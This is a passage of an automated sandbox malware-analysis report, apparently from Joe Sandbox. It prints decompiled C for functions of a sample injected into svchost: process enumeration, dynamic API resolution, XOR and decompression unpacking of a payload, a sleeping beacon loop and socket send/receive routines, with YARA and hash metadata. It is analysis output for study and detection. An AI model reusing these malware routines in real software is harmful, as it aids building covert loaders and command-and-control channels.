                                                                                                                                        • EnumProcesses.PSAPI(?,00001000,?,?,02443080,explorer.exe), ref: 0244311D
                                                                                                                                        • lstrcmpiA.KERNEL32(?,02443080,?,?,02443080), ref: 02443177
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumProcesseslstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1246086236-0
                                                                                                                                        • Opcode ID: 27c896115ec6ad8668823a2a95eafcf248d07c07af89c232772b2c0debd1fdce
                                                                                                                                        • Instruction ID: 3030cb91403155f93b55ae05e5ea7a6ff9d83396f093f5155108ef713e408cf9
                                                                                                                                        • Opcode Fuzzy Hash: 27c896115ec6ad8668823a2a95eafcf248d07c07af89c232772b2c0debd1fdce
                                                                                                                                        • Instruction Fuzzy Hash: D3112571D00108EBEB19DF95D941AEDBBB9BF48794F2046DEE51597280EB34AE80CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 6.12%

                                                                                                                                        Function 10002491, Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E10002491(CHAR* _a4, _Unknown_base(*)()** _a8) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t10;
				CHAR* _t12;
				_Unknown_base(*)()** _t13;

				_t4 = LoadLibraryA(_a4); // executed
				_t5 = _t4;
				if(_t5 != 0) {
					_t12 = _a4;
					_t10 = _t5;
					_t13 = _a8;
					while(1) {
						asm("cld");
						asm("repne scasb");
						if( *_t12 == 0) {
							break;
						}
						_t8 = GetProcAddress(_t10, _t12); // executed
						_t9 = _t8;
						if(_t9 != 0) {
							 *_t13 = _t9;
							_t13 = _t13 + 4;
							continue;
						} else {
							return _t9;
						}
						goto L8;
					}
					return 1;
				} else {
					return _t5;
				}
				L8:
			}










                                                                                                                                        0x1000249a
                                                                                                                                        0x100024a0
                                                                                                                                        0x100024a2
                                                                                                                                        0x100024ab
                                                                                                                                        0x100024af
                                                                                                                                        0x100024b2
                                                                                                                                        0x100024b5
                                                                                                                                        0x100024b7
                                                                                                                                        0x100024be
                                                                                                                                        0x100024c4
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100024c8
                                                                                                                                        0x100024cd
                                                                                                                                        0x100024cf
                                                                                                                                        0x100024d8
                                                                                                                                        0x100024da
                                                                                                                                        0x00000000
                                                                                                                                        0x100024d5
                                                                                                                                        0x100024d5
                                                                                                                                        0x100024d5
                                                                                                                                        0x00000000
                                                                                                                                        0x100024cf
                                                                                                                                        0x100024e8
                                                                                                                                        0x100024a8
                                                                                                                                        0x100024a8
                                                                                                                                        0x100024a8
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1000249A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 100024C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                        • Opcode ID: 870185dbd015ea786528823a665d77c1e5f872cbc3fa789be7688ac631c3e2fb
                                                                                                                                        • Instruction ID: d3a6b0a3fd31fd340069383c012ec627f624441b07a0343c5925038ed23a94d8
                                                                                                                                        • Opcode Fuzzy Hash: 870185dbd015ea786528823a665d77c1e5f872cbc3fa789be7688ac631c3e2fb
                                                                                                                                        • Instruction Fuzzy Hash: DDF0E9773040051AE710DA39EC4198EAFC8D7E33F8B104132F906A7189E569DC85C3A0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 10001EEF, Relevance: 3.0, APIs: 2, Instructions: 31fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001EEF(CHAR* _a4) {
				char* _t4;
				void* _t6;
				void* _t11;

				_t4 = _a4;
				if(_t4 == 0 ||  *_t4 == 0) {
					return 0;
				} else {
					_t6 = CreateFileA(_a4, 0x80, 0, 0, 3, 0, 0); // executed
					_t11 = _t6 + 1;
					if(_t11 != 0) {
						CloseHandle(_t11 - 1); // executed
						return 1;
					}
					return 0;
				}
			}






                                                                                                                                        0x10001ef6
                                                                                                                                        0x10001ef8
                                                                                                                                        0x10001f06
                                                                                                                                        0x10001f09
                                                                                                                                        0x10001f1b
                                                                                                                                        0x10001f24
                                                                                                                                        0x10001f25
                                                                                                                                        0x10001f29
                                                                                                                                        0x00000000
                                                                                                                                        0x10001f2e
                                                                                                                                        0x10001f35
                                                                                                                                        0x10001f35

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 10001F1B
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 10001F29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3498533004-0
                                                                                                                                        • Opcode ID: cdcc382cb588571cf2e4d2ce0265a9c1c0183c5f261a78be77ae25a8d83fa87d
                                                                                                                                        • Instruction ID: 35d315fe695ac5584e02851765a74a28a0ab811d8fee9b5a65efbe62112bd4f2
                                                                                                                                        • Opcode Fuzzy Hash: cdcc382cb588571cf2e4d2ce0265a9c1c0183c5f261a78be77ae25a8d83fa87d
                                                                                                                                        • Instruction Fuzzy Hash: 0DE04F727507893AF7329A68DC83F5525C8D7017D8F204531B755EE1CAE5E9ED414218
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 100038E3, Relevance: 3.0, APIs: 2, Instructions: 22networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E100038E3(void* __eax, intOrPtr _a4) {
				void* _t5;
				intOrPtr* _t7;

				_push(_a4);
				L1000B8D2();
				if(__eax == 0xffffffff) {
					_push(_a4);
					L1000B8D8(); // executed
					_t5 = __eax;
					if(_t5 != 0) {
						_t7 =  *((intOrPtr*)(_t5 + 0xc));
						if(_t7 != 0) {
							return  *((intOrPtr*)( *_t7));
						}
						return 0xffffffff;
					}
					return 0xffffffff;
				}
				return __eax;
			}





                                                                                                                                        0x100038e6
                                                                                                                                        0x100038e9
                                                                                                                                        0x100038f1
                                                                                                                                        0x100038f3
                                                                                                                                        0x100038f6
                                                                                                                                        0x100038fb
                                                                                                                                        0x100038fd
                                                                                                                                        0x1000390a
                                                                                                                                        0x1000390c
                                                                                                                                        0x00000000
                                                                                                                                        0x10003917
                                                                                                                                        0x00000000
                                                                                                                                        0x1000390e
                                                                                                                                        0x00000000
                                                                                                                                        0x100038ff
                                                                                                                                        0x1000391a

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: gethostbynameinet_addr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1594361348-0
                                                                                                                                        • Opcode ID: 8c400096880104600583be4b6b922c41cb276276376e47ed8660e36d45976d36
                                                                                                                                        • Instruction ID: 3d936b1e40c040e39a6e134a820fed943076fd0182b4c0a063608c00e74aed5d
                                                                                                                                        • Opcode Fuzzy Hash: 8c400096880104600583be4b6b922c41cb276276376e47ed8660e36d45976d36
                                                                                                                                        • Instruction Fuzzy Hash: BFE0B6352049069BA612CA29D84180A7B98EB062F8725C312F574DB2F9EBB0E9209781
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 1000396D, Relevance: 3.0, APIs: 2, Instructions: 16networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                        			E1000396D(intOrPtr __eax) {
				void* _t4;
				void* _t8;

				 *((intOrPtr*)(_t8 - 0xc)) = __eax;
				_push(0x10);
				_t4 = _t8 - 0x10;
				_push(_t4);
				_push(0); // executed
				L1000B8E4(); // executed
				if(_t4 == 0xffffffff) {
					_push(0);
					L1000B8EA();
				}
				return 0;
			}





                                                                                                                                        0x1000397e
                                                                                                                                        0x10003981
                                                                                                                                        0x10003983
                                                                                                                                        0x10003986
                                                                                                                                        0x10003987
                                                                                                                                        0x10003988
                                                                                                                                        0x10003990
                                                                                                                                        0x10003992
                                                                                                                                        0x10003993
                                                                                                                                        0x10003998
                                                                                                                                        0x1000399e

                                                                                                                                        APIs
                                                                                                                                        • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003988
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003993
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: closesocketconnect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323028321-0
                                                                                                                                        • Opcode ID: 69cb5497a60836a45aace7dc6f59573714a35a3096fefe75253120fbf4fb7fd9
                                                                                                                                        • Instruction ID: 065c32b9e06246834b904166c4d3de4238c759a38f7dea1ba7916fe768c60376
                                                                                                                                        • Opcode Fuzzy Hash: 69cb5497a60836a45aace7dc6f59573714a35a3096fefe75253120fbf4fb7fd9
                                                                                                                                        • Instruction Fuzzy Hash: 67D0C971A0060469F711CBB95CC1AAFA39CEB102A8B109A2BF636D11D9D5B4D404A620
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.11%

                                                                                                                                        Function 02442500, Relevance: 2.6, APIs: 2, Instructions: 91sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E02442500(void* __eflags) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t54;
				void* _t57;

				_v12 = 0x80000;
				_t34 = E02441390(_v12); // executed
				_v20 = _t34;
				_v40 = _v20 + 4;
				_v28 = E02441390(_v12);
				_t36 = E02441390(0x1000);
				_t57 = _t54 + 0xc;
				_v8 = _t36;
				_v36 = 1;
				while(_v36 == 1) {
					_v24 = 0;
					_t36 = E02441580(_v12, _v20, _v20, _v12,  &_v44); // executed
					_t57 = _t57 + 0xc;
					_v24 = _t36;
					if(_v24 != 1) {
						L12:
						if(_v36 == 1) {
							Sleep(0xea60); // executed
							_t36 = E024426B0();
							Sleep(0xea60); // executed
						}
						continue;
					}
					_t39 = E024424A0(_v40, _v28);
					_t57 = _t57 + 8;
					_v44 = _t39;
					_v16 = _v28;
					while(1) {
						_t36 = 1;
						if(1 == 0) {
							goto L12;
						}
						_v16 = E024428A0(_v8, _v16, _v8);
						_t36 = E02442130(_v8, _v8);
						_t57 = _t57 + 0xc;
						if(1 == 1) {
							_v32 = 0;
							_t36 = E02442720(_v8,  &_v32); // executed
							_t57 = _t57 + 8;
							if(1 == 1 && _v32 == 0) {
								_t36 = E02442630( &_v32, _v8);
								_t57 = _t57 + 4;
							}
						}
						if(_v16 != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L12;
				}
				return _t36;
			}


















                                                                                                                                        0x02442506
                                                                                                                                        0x02442511
                                                                                                                                        0x02442519
                                                                                                                                        0x02442522
                                                                                                                                        0x02442531
                                                                                                                                        0x02442539
                                                                                                                                        0x0244253e
                                                                                                                                        0x02442541
                                                                                                                                        0x02442544
                                                                                                                                        0x0244254b
                                                                                                                                        0x02442555
                                                                                                                                        0x02442568
                                                                                                                                        0x0244256d
                                                                                                                                        0x02442570
                                                                                                                                        0x02442577
                                                                                                                                        0x024425f7
                                                                                                                                        0x024425fb
                                                                                                                                        0x02442602
                                                                                                                                        0x02442608
                                                                                                                                        0x02442612
                                                                                                                                        0x02442612
                                                                                                                                        0x00000000
                                                                                                                                        0x02442618
                                                                                                                                        0x02442581
                                                                                                                                        0x02442586
                                                                                                                                        0x02442589
                                                                                                                                        0x0244258f
                                                                                                                                        0x02442592
                                                                                                                                        0x02442592
                                                                                                                                        0x02442599
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x024425ab
                                                                                                                                        0x024425b2
                                                                                                                                        0x024425b7
                                                                                                                                        0x024425bd
                                                                                                                                        0x024425bf
                                                                                                                                        0x024425ce
                                                                                                                                        0x024425d3
                                                                                                                                        0x024425d9
                                                                                                                                        0x024425e5
                                                                                                                                        0x024425ea
                                                                                                                                        0x024425ea
                                                                                                                                        0x024425d9
                                                                                                                                        0x024425f1
                                                                                                                                        0x00000000
                                                                                                                                        0x024425f3
                                                                                                                                        0x00000000
                                                                                                                                        0x024425f3
                                                                                                                                        0x024425f1
                                                                                                                                        0x00000000
                                                                                                                                        0x02442592
                                                                                                                                        0x02442620

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
                                                                                                                                          • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
                                                                                                                                          • Part of subcall function 02441580: GetVersion.KERNEL32 ref: 024415AF
                                                                                                                                          • Part of subcall function 02441580: wsprintfA.USER32 ref: 02441652
                                                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 02442602
                                                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 02442612
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSleep$AllocateProcessVersionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1739176888-0
                                                                                                                                        • Opcode ID: fe8af558304419022be10ff670e66ed83e135e8d78cd516acfe8f9a703f40dea
                                                                                                                                        • Instruction ID: 336eb5adbfded6a6cfe056cd8633f112f8d3d74dfad5d1ab992b1aea7d85558f
                                                                                                                                        • Opcode Fuzzy Hash: fe8af558304419022be10ff670e66ed83e135e8d78cd516acfe8f9a703f40dea
                                                                                                                                        • Instruction Fuzzy Hash: 303143B5D001089BFF14DFD5D955BEEB7B9BB08304F10446AE909B6240EBB5AA44CF62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Function 024418A0, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E024418A0(void* __eflags, intOrPtr _a4, intOrPtr _a8, long _a12) {
				signed int _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _t33;
				void* _t66;
				void* _t67;

				_t33 = E02441390(_a12);
				_t67 = _t66 + 4;
				_v12 = _t33;
				_v8 = 8;
				while(_v8 < _a8) {
					 *(_a4 + _v8) =  *(_a4 + _v8) ^  *(_a4 + _v8 % 8);
					_v8 = _v8 + 1;
				}
				_v16 = RtlDecompressBuffer(2, _v12, _a12, _a4 + 8, _a8 - 8,  &_v20);
				if(_v16 == 0) {
					E02441450(_a4, _v12, _v20);
					_t67 = _t67 + 0xc;
				}
				E024413D0(_v12); // executed
				if(_v16 != 0) {
					return 0;
				}
				return _v20;
			}










                                                                                                                                        0x024418aa
                                                                                                                                        0x024418af
                                                                                                                                        0x024418b2
                                                                                                                                        0x024418b5
                                                                                                                                        0x024418c7
                                                                                                                                        0x024418f3
                                                                                                                                        0x024418c4
                                                                                                                                        0x024418c4
                                                                                                                                        0x02441919
                                                                                                                                        0x02441920
                                                                                                                                        0x0244192e
                                                                                                                                        0x02441933
                                                                                                                                        0x02441933
                                                                                                                                        0x0244193a
                                                                                                                                        0x02441946
                                                                                                                                        0x00000000
                                                                                                                                        0x0244194d
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
                                                                                                                                          • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
                                                                                                                                        • RtlDecompressBuffer.NTDLL(00000002,?,02441E40,?,004FFFF8,02441E40), ref: 02441913
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateBufferDecompressProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2896260840-0
                                                                                                                                        • Opcode ID: f62f883a216b71a3e1029302e0321fafd6729d4e216a2095fb46150405a2c5c8
                                                                                                                                        • Instruction ID: df66b5cfab17f793fe6972fe727095444cae913657ee4e4c9788c1732432fe85
                                                                                                                                        • Opcode Fuzzy Hash: f62f883a216b71a3e1029302e0321fafd6729d4e216a2095fb46150405a2c5c8
                                                                                                                                        • Instruction Fuzzy Hash: 80216F70E04148EFEB04CF98D880EAEBBB5BF48304F04859DE91D97301DA34AA80CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.01%

                                                                                                                                        Function 10003ABF, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                        			E10003ABF(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v2052;
				void* _t14;
				void* _t17;
				intOrPtr _t19;
				char* _t20;
				void* _t23;
				intOrPtr _t24;

				_t24 = 0;
				_t14 = E100039ED(_a4, 0x5a); // executed
				if(_t14 != 0) {
					while(1) {
						_t17 = E100039ED(_a4, 0x5a); // executed
						if(_t17 == 0) {
							break;
						}
						__eflags = _a12 - 0x800;
						if(_a12 <= 0x800) {
							_t19 = _a12;
						} else {
							_t19 = 0x800;
						}
						_push(0);
						_push(_t19);
						_t20 =  &_v2052;
						_push(_t20);
						_push(_a4);
						L1000B8FC(); // executed
						__eflags = _t20;
						if(__eflags >= 0) {
							if(__eflags != 0) {
								 *((intOrPtr*)( *_a8 + 0x10))(_a8,  &_v2052, _t20, 0, _t20);
								_pop(_t23);
								_a12 = _a12 - _t23;
								__eflags = _a12;
								if(_a12 != 0) {
									__eflags = _t24;
									if(_t24 == 0) {
										continue;
									}
								} else {
									_t24 = _t24 + 1;
								}
							} else {
								_t24 = _t24 + 1;
							}
						} else {
						}
						goto L13;
					}
				}
				L13:
				return _t24;
			}










                                                                                                                                        0x10003ac9
                                                                                                                                        0x10003ad0
                                                                                                                                        0x10003ad7
                                                                                                                                        0x10003ad9
                                                                                                                                        0x10003ade
                                                                                                                                        0x10003ae5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10003ae9
                                                                                                                                        0x10003af0
                                                                                                                                        0x10003af9
                                                                                                                                        0x10003af2
                                                                                                                                        0x10003af2
                                                                                                                                        0x10003af2
                                                                                                                                        0x10003afc
                                                                                                                                        0x10003afe
                                                                                                                                        0x10003aff
                                                                                                                                        0x10003b05
                                                                                                                                        0x10003b06
                                                                                                                                        0x10003b09
                                                                                                                                        0x10003b0e
                                                                                                                                        0x10003b10
                                                                                                                                        0x10003b14
                                                                                                                                        0x10003b2c
                                                                                                                                        0x10003b2f
                                                                                                                                        0x10003b30
                                                                                                                                        0x10003b33
                                                                                                                                        0x10003b37
                                                                                                                                        0x10003b3c
                                                                                                                                        0x10003b3e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10003b39
                                                                                                                                        0x10003b39
                                                                                                                                        0x10003b39
                                                                                                                                        0x10003b16
                                                                                                                                        0x10003b16
                                                                                                                                        0x10003b16
                                                                                                                                        0x00000000
                                                                                                                                        0x10003b12
                                                                                                                                        0x00000000
                                                                                                                                        0x10003b10
                                                                                                                                        0x10003ae7
                                                                                                                                        0x10003b40
                                                                                                                                        0x10003b44

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100039ED: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 10003A32
                                                                                                                                        • recv.WSOCK32(?,?,00000800,00000000), ref: 10003B09
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: recvselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 741273618-0
                                                                                                                                        • Opcode ID: 2bc4adfe2a715844beb8abf061af59916263bcd51503f0c77ffb414e8d61ecd3
                                                                                                                                        • Instruction ID: d636064a006fd17202ecd500ecd5a60456039cd65286e38085f50bf31f6252e2
                                                                                                                                        • Opcode Fuzzy Hash: 2bc4adfe2a715844beb8abf061af59916263bcd51503f0c77ffb414e8d61ecd3
                                                                                                                                        • Instruction Fuzzy Hash: 0C01613160024AAFFB12DE51CC91B5BB3ACFB003C8F10C176BB5195199D771D9449A95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 10003A4D, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                        			E10003A4D(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				void* __ebx;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t23;

				_t23 = 0;
				_t13 = E100039ED(_a4, 0x5a); // executed
				if(_t13 != 0) {
					while(1) {
						_t16 = E100039ED(_a4, 0x5a); // executed
						if(_t16 == 0) {
							break;
						}
						_push(0);
						_push(1);
						_t18 =  &_v5;
						_push(_t18);
						_push(_a4);
						L1000B8FC(); // executed
						if(_t18 > 0) {
							if(_v5 == _a16) {
								_t23 = 1;
							}
							_t25 =  *_a8;
							_push(0);
							_push(1);
							_push( &_v5);
							_push(_a8);
							if(E10001091( *((intOrPtr*)( *_a8 + 0x10))(), _t23, _t25, _a8) < _a12) {
								if(_t23 == 0) {
									continue;
								}
							} else {
							}
						}
						goto L9;
					}
				}
				L9:
				return _t23;
			}









                                                                                                                                        0x10003a54
                                                                                                                                        0x10003a5b
                                                                                                                                        0x10003a62
                                                                                                                                        0x10003a64
                                                                                                                                        0x10003a69
                                                                                                                                        0x10003a70
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10003a74
                                                                                                                                        0x10003a76
                                                                                                                                        0x10003a78
                                                                                                                                        0x10003a7b
                                                                                                                                        0x10003a7c
                                                                                                                                        0x10003a7f
                                                                                                                                        0x10003a86
                                                                                                                                        0x10003a8e
                                                                                                                                        0x10003a90
                                                                                                                                        0x10003a90
                                                                                                                                        0x10003a95
                                                                                                                                        0x10003a97
                                                                                                                                        0x10003a99
                                                                                                                                        0x10003a9e
                                                                                                                                        0x10003a9f
                                                                                                                                        0x10003ab0
                                                                                                                                        0x10003ab6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10003ab2
                                                                                                                                        0x10003ab0
                                                                                                                                        0x00000000
                                                                                                                                        0x10003a86
                                                                                                                                        0x10003a72
                                                                                                                                        0x10003ab8
                                                                                                                                        0x10003abc

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100039ED: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 10003A32
                                                                                                                                        • recv.WSOCK32(?,?,00000001,00000000), ref: 10003A7F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: recvselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 741273618-0
                                                                                                                                        • Opcode ID: b7e7d1726f9433d0df41575daf561d69f34c677a7894c62c472bc8c03f918bc0
                                                                                                                                        • Instruction ID: fc4faf5e530eceac94ad05d1ac786ec5ce5fd3324f67245f2d8adfd0b8eff3ec
                                                                                                                                        • Opcode Fuzzy Hash: b7e7d1726f9433d0df41575daf561d69f34c677a7894c62c472bc8c03f918bc0
                                                                                                                                        • Instruction Fuzzy Hash: C101713174424ABBFB02CE54CC82B9FB7ADEB163C0F10C161B9509919AD7B2E9458752
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 100039A1, Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                        			E100039A1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				intOrPtr _t12;

				if(_a12 != 0) {
					_t12 = _a8;
					_t11 = 0;
					while(1) {
						_push(0);
						_push(_a12);
						_push(_t12);
						_push(_a4);
						L1000B8F0(); // executed
						if(_t8 <= 0) {
							break;
						}
						_t12 = _t12 + _t8;
						_a12 = _a12 - _t8;
						if(_a12 != 0) {
							continue;
						} else {
							_t11 = 1;
						}
						break;
					}
					return _t11;
				} else {
					return 1;
				}
			}






                                                                                                                                        0x100039aa
                                                                                                                                        0x100039b7
                                                                                                                                        0x100039ba
                                                                                                                                        0x100039bf
                                                                                                                                        0x100039bf
                                                                                                                                        0x100039c1
                                                                                                                                        0x100039c4
                                                                                                                                        0x100039c5
                                                                                                                                        0x100039c8
                                                                                                                                        0x100039cf
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100039d1
                                                                                                                                        0x100039d3
                                                                                                                                        0x100039da
                                                                                                                                        0x00000000
                                                                                                                                        0x100039dc
                                                                                                                                        0x100039dc
                                                                                                                                        0x100039dc
                                                                                                                                        0x00000000
                                                                                                                                        0x100039da
                                                                                                                                        0x100039ea
                                                                                                                                        0x100039ac
                                                                                                                                        0x100039b4
                                                                                                                                        0x100039b4

                                                                                                                                        APIs
                                                                                                                                        • send.WSOCK32(?,?,00000000,00000000), ref: 100039C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: send
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                        • Opcode ID: 3e51ce52bfd68b06b1bc1f6fd312fb8546888a7c791e24dd4e33e58b340cee1d
                                                                                                                                        • Instruction ID: bbfd60de75a96c126de5282d17f2767d6f83f4fc78f2c0413de47844af8da33d
                                                                                                                                        • Opcode Fuzzy Hash: 3e51ce52bfd68b06b1bc1f6fd312fb8546888a7c791e24dd4e33e58b340cee1d
                                                                                                                                        • Instruction Fuzzy Hash: 84F030322042499BFB12CE55DC41B4F7398EB953D8F118436FD0186285D3F6D895C791
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 100039ED, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 29%
                                                                                                                                        			E100039ED(intOrPtr _a4, intOrPtr _a8) {
				void* _v260;
				char _v264;
				intOrPtr _v268;
				char _v272;
				char* _t11;
